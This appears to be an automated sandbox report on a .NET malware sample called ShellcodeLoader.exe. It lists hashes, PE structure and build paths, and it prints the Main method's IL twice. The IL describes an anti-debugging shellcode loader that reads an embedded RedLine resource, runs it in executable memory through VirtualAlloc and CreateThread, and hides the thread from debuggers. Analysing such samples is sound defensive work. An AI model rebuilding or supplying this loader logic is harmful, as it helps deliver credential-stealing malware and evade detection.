Suspicious
Suspect

308e6daeabe60a18225112c8a15b8316

PE Executable
|
MD5: 308e6daeabe60a18225112c8a15b8316
|
Size: 473.6 KB
|
application/x-dosexec

Print
Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Very low

Hash
 Hash Value
MD5
308e6daeabe60a18225112c8a15b8316
Sha1
93766d0e67da75e33b16f237d39d9f93320ee8e8
Sha256
67559021bb3b13bef30226a052dd097156aa998543f4a3689649f4e00de86686
Sha384
c2eb774feb63d08c5bca99ef6c2a40758be09bd62bb316d2893d774d7ee53fb2f2e71c163a58c325cd0389d9948d3435
Sha512
77e20f0190bc000d2523a85e1cac598b8ceee67d514f51b519fcd00a3f4b537a9a34070c508d156e9d772e58b90c47b0cdd6106d49e76c7b39c7fbed83333ddb
SSDeep
12288:+oIoLkq/s+veQ3kzchV0Vd0e0CwMAxU5SEIXWQwaw18i:lrQgs+veQUzcD0VGCJAC5SEEwh18
TLSH
E6A4232267F241E1D160A13EED319596DF7071AA173C078F72BE89A61B233129B1D3F9

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
308e6daeabe60a18225112c8a15b8316
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
ShellcodeLoader.redline.bin
ShellcodeLoader.shellcode.bin
costura.costura.dll.compressed
costura.costura.dll
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.costura.pdb.compressed
costura.costura.pdb
costura.metadata
Informations
Name
 Value
Module Name

ShellcodeLoader.exe
Full Name

ShellcodeLoader.exe
EntryPoint

System.Void ShellcodeLoader.Program::Main(System.String[])
Scope Name

ShellcodeLoader.exe
Scope Type

ModuleDef
Kind

Console
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

ShellcodeLoader
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.7.2
Total Strings

16
Main Method

System.Void ShellcodeLoader.Program::Main(System.String[])
Main IL Instruction Count

202
Main IL

nop <null> nop <null> call System.Boolean ShellcodeLoader.Program::IsDebuggerDetected() stloc.s V_4 ldloc.s V_4 brfalse.s IL_0021: call System.Int64 System.Diagnostics.Stopwatch::GetTimestamp() nop <null> ldstr Fuck off, debugger detected. Exiting this shit. call System.Void System.Console::WriteLine(System.String) nop <null> ldc.i4.1 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> nop <null> call System.Int64 System.Diagnostics.Stopwatch::GetTimestamp() stloc.0 <null> ldc.i4.1 <null> call System.Void System.Threading.Thread::Sleep(System.Int32) nop <null> call System.Int64 System.Diagnostics.Stopwatch::GetTimestamp() stloc.1 <null> ldloc.1 <null> ldloc.0 <null> sub <null> conv.r8 <null> ldsfld System.Int64 System.Diagnostics.Stopwatch::Frequency conv.r8 <null> div <null> ldc.r8 1000 mul <null> stloc.2 <null> ldloc.2 <null> ldc.r8 100 cgt <null> stloc.s V_5 ldloc.s V_5 brfalse.s IL_0070: ldstr "ShellcodeLoader.redline.bin" nop <null> ldstr Shit, timing check failed. Debugger's probably fucking with us. call System.Void System.Console::WriteLine(System.String) nop <null> ldc.i4.1 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> nop <null> ldstr ShellcodeLoader.redline.bin stloc.3 <null> ldstr Listing embedded resources for debug: call System.Void System.Console::WriteLine(System.String) nop <null> nop <null> call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() callvirt System.String[] System.Reflection.Assembly::GetManifestResourceNames() stloc.s V_6 ldc.i4.0 <null> stloc.s V_7 br.s IL_00B4: ldloc.s V_7 ldloc.s V_6 ldloc.s V_7 ldelem.ref <null> stloc.s V_8 nop <null> ldstr Found resource: ldloc.s V_8 call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) nop <null> nop <null> ldloc.s V_7 ldc.i4.1 <null> add <null> stloc.s V_7 ldloc.s V_7 ldloc.s V_6 ldlen <null> conv.i4 <null> blt.s IL_0093: ldloc.s V_6 call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() ldloc.3 <null> callvirt System.IO.Stream System.Reflection.Assembly::GetManifestResourceStream(System.String) stloc.s V_9 nop <null> ldloc.s V_9 ldnull <null> ceq <null> stloc.s V_15 ldloc.s V_15 brfalse.s IL_00EC: ldloc.s V_9 nop <null> ldstr Fuck, couldn't find the embedded resource: ldloc.3 <null> call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) nop <null> leave IL_01FE: ret ldloc.s V_9 newobj System.Void System.IO.BinaryReader::.ctor(System.IO.Stream) stloc.s V_16 nop <null> ldloc.s V_16 ldloc.s V_9 callvirt System.Int64 System.IO.Stream::get_Length() conv.i4 <null> callvirt System.Byte[] System.IO.BinaryReader::ReadBytes(System.Int32) stloc.s V_10 nop <null> leave.s IL_0117: ldsfld System.IntPtr System.IntPtr::Zero ldloc.s V_16 brfalse.s IL_0116: endfinally ldloc.s V_16 callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> ldsfld System.IntPtr System.IntPtr::Zero ldloc.s V_10 ldlen <null> conv.i4 <null> ldc.i4 12288 ldc.i4.s 64 call System.IntPtr ShellcodeLoader.Program::VirtualAlloc(System.IntPtr,System.UInt32,System.UInt32,System.UInt32) stloc.s V_11 ldloc.s V_11 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) stloc.s V_17 ldloc.s V_17 brfalse.s IL_0151: ldloc.s V_10 nop <null> ldstr Shit, memory allocation failed. call System.Void System.Console::WriteLine(System.String) nop <null> leave IL_01FE: ret ldloc.s V_10 ldc.i4.0 <null> ldloc.s V_11 ldloc.s V_10 ldlen <null> conv.i4 <null> call System.Void System.Runtime.InteropServices.Marshal::Copy(System.Byte[],System.Int32,System.IntPtr,System.Int32) nop <null> ldsfld System.IntPtr System.IntPtr::Zero ldc.i4.0 <null> ldloc.s V_11 ldsfld System.IntPtr System.IntPtr::Zero ldc.i4.0 <null> ldloca.s V_12 call System.IntPtr ShellcodeLoader.Program::CreateThread(System.IntPtr,System.UInt32,System.IntPtr,System.IntPtr,System.UInt32,System.UInt32&) stloc.s V_13 ldloc.s V_13 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) stloc.s V_18 ldloc.s V_18 brfalse.s IL_0197: ldloc.s V_13 nop <null> ldstr Damn, thread creation failed. call System.Void System.Console::WriteLine(System.String) nop <null> leave.s IL_01FE: ret ldloc.s V_13 ldc.i4.s 17 ldsfld System.IntPtr System.IntPtr::Zero ldc.i4.0 <null> ldsfld System.IntPtr System.IntPtr::Zero call System.Int32 ShellcodeLoader.Program::NtQueryInformationThread(System.IntPtr,System.Int32,System.IntPtr,System.Int32,System.IntPtr) stloc.s V_14 ldloc.s V_14 ldc.i4.0 <null> cgt.un <null> stloc.s V_19 ldloc.s V_19 brfalse.s IL_01C5: ldloc.s V_13 nop <null> ldstr Fuck, failed to hide thread from debugger. call System.Void System.Console::WriteLine(System.String) nop <null> nop <null> ldloc.s V_13 ldc.i4.m1 <null> call System.UInt32 ShellcodeLoader.Program::WaitForSingleObject(System.IntPtr,System.UInt32) pop <null> nop <null> leave.s IL_01DE: nop ldloc.s V_9 brfalse.s IL_01DD: endfinally ldloc.s V_9 callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> nop <null> leave.s IL_01FE: ret stloc.s V_20 nop <null> ldstr Fucking error: ldloc.s V_20 callvirt System.String System.Exception::get_Message() call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) nop <null> nop <null> leave.s IL_01FE: ret ret <null>
Module Name

ShellcodeLoader.exe
Full Name

ShellcodeLoader.exe
EntryPoint

System.Void ShellcodeLoader.Program::Main(System.String[])
Scope Name

ShellcodeLoader.exe
Scope Type

ModuleDef
Kind

Console
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

ShellcodeLoader
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.7.2
Total Strings

16
Main Method

System.Void ShellcodeLoader.Program::Main(System.String[])
Main IL Instruction Count

202
Main IL

nop <null> nop <null> call System.Boolean ShellcodeLoader.Program::IsDebuggerDetected() stloc.s V_4 ldloc.s V_4 brfalse.s IL_0021: call System.Int64 System.Diagnostics.Stopwatch::GetTimestamp() nop <null> ldstr Fuck off, debugger detected. Exiting this shit. call System.Void System.Console::WriteLine(System.String) nop <null> ldc.i4.1 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> nop <null> call System.Int64 System.Diagnostics.Stopwatch::GetTimestamp() stloc.0 <null> ldc.i4.1 <null> call System.Void System.Threading.Thread::Sleep(System.Int32) nop <null> call System.Int64 System.Diagnostics.Stopwatch::GetTimestamp() stloc.1 <null> ldloc.1 <null> ldloc.0 <null> sub <null> conv.r8 <null> ldsfld System.Int64 System.Diagnostics.Stopwatch::Frequency conv.r8 <null> div <null> ldc.r8 1000 mul <null> stloc.2 <null> ldloc.2 <null> ldc.r8 100 cgt <null> stloc.s V_5 ldloc.s V_5 brfalse.s IL_0070: ldstr "ShellcodeLoader.redline.bin" nop <null> ldstr Shit, timing check failed. Debugger's probably fucking with us. call System.Void System.Console::WriteLine(System.String) nop <null> ldc.i4.1 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> nop <null> ldstr ShellcodeLoader.redline.bin stloc.3 <null> ldstr Listing embedded resources for debug: call System.Void System.Console::WriteLine(System.String) nop <null> nop <null> call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() callvirt System.String[] System.Reflection.Assembly::GetManifestResourceNames() stloc.s V_6 ldc.i4.0 <null> stloc.s V_7 br.s IL_00B4: ldloc.s V_7 ldloc.s V_6 ldloc.s V_7 ldelem.ref <null> stloc.s V_8 nop <null> ldstr Found resource: ldloc.s V_8 call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) nop <null> nop <null> ldloc.s V_7 ldc.i4.1 <null> add <null> stloc.s V_7 ldloc.s V_7 ldloc.s V_6 ldlen <null> conv.i4 <null> blt.s IL_0093: ldloc.s V_6 call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() ldloc.3 <null> callvirt System.IO.Stream System.Reflection.Assembly::GetManifestResourceStream(System.String) stloc.s V_9 nop <null> ldloc.s V_9 ldnull <null> ceq <null> stloc.s V_15 ldloc.s V_15 brfalse.s IL_00EC: ldloc.s V_9 nop <null> ldstr Fuck, couldn't find the embedded resource: ldloc.3 <null> call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) nop <null> leave IL_01FE: ret ldloc.s V_9 newobj System.Void System.IO.BinaryReader::.ctor(System.IO.Stream) stloc.s V_16 nop <null> ldloc.s V_16 ldloc.s V_9 callvirt System.Int64 System.IO.Stream::get_Length() conv.i4 <null> callvirt System.Byte[] System.IO.BinaryReader::ReadBytes(System.Int32) stloc.s V_10 nop <null> leave.s IL_0117: ldsfld System.IntPtr System.IntPtr::Zero ldloc.s V_16 brfalse.s IL_0116: endfinally ldloc.s V_16 callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> ldsfld System.IntPtr System.IntPtr::Zero ldloc.s V_10 ldlen <null> conv.i4 <null> ldc.i4 12288 ldc.i4.s 64 call System.IntPtr ShellcodeLoader.Program::VirtualAlloc(System.IntPtr,System.UInt32,System.UInt32,System.UInt32) stloc.s V_11 ldloc.s V_11 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) stloc.s V_17 ldloc.s V_17 brfalse.s IL_0151: ldloc.s V_10 nop <null> ldstr Shit, memory allocation failed. call System.Void System.Console::WriteLine(System.String) nop <null> leave IL_01FE: ret ldloc.s V_10 ldc.i4.0 <null> ldloc.s V_11 ldloc.s V_10 ldlen <null> conv.i4 <null> call System.Void System.Runtime.InteropServices.Marshal::Copy(System.Byte[],System.Int32,System.IntPtr,System.Int32) nop <null> ldsfld System.IntPtr System.IntPtr::Zero ldc.i4.0 <null> ldloc.s V_11 ldsfld System.IntPtr System.IntPtr::Zero ldc.i4.0 <null> ldloca.s V_12 call System.IntPtr ShellcodeLoader.Program::CreateThread(System.IntPtr,System.UInt32,System.IntPtr,System.IntPtr,System.UInt32,System.UInt32&) stloc.s V_13 ldloc.s V_13 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) stloc.s V_18 ldloc.s V_18 brfalse.s IL_0197: ldloc.s V_13 nop <null> ldstr Damn, thread creation failed. call System.Void System.Console::WriteLine(System.String) nop <null> leave.s IL_01FE: ret ldloc.s V_13 ldc.i4.s 17 ldsfld System.IntPtr System.IntPtr::Zero ldc.i4.0 <null> ldsfld System.IntPtr System.IntPtr::Zero call System.Int32 ShellcodeLoader.Program::NtQueryInformationThread(System.IntPtr,System.Int32,System.IntPtr,System.Int32,System.IntPtr) stloc.s V_14 ldloc.s V_14 ldc.i4.0 <null> cgt.un <null> stloc.s V_19 ldloc.s V_19 brfalse.s IL_01C5: ldloc.s V_13 nop <null> ldstr Fuck, failed to hide thread from debugger. call System.Void System.Console::WriteLine(System.String) nop <null> nop <null> ldloc.s V_13 ldc.i4.m1 <null> call System.UInt32 ShellcodeLoader.Program::WaitForSingleObject(System.IntPtr,System.UInt32) pop <null> nop <null> leave.s IL_01DE: nop ldloc.s V_9 brfalse.s IL_01DD: endfinally ldloc.s V_9 callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> nop <null> leave.s IL_01FE: ret stloc.s V_20 nop <null> ldstr Fucking error: ldloc.s V_20 callvirt System.String System.Exception::get_Message() call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) nop <null> nop <null> leave.s IL_01FE: ret ret <null>
Artefacts
Name
 Value
PDB Path

D:\Crypter\C# SHellcode\Loader\obj\Debug\net472\ShellcodeLoader.pdb
PDB Path

C:\CI_WS\Ws\274459\Source\Costura_Fody\src\Costura\obj\Release\netstandard2.0\Costura.pdb
308e6daeabe60a18225112c8a15b8316 (473.6 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙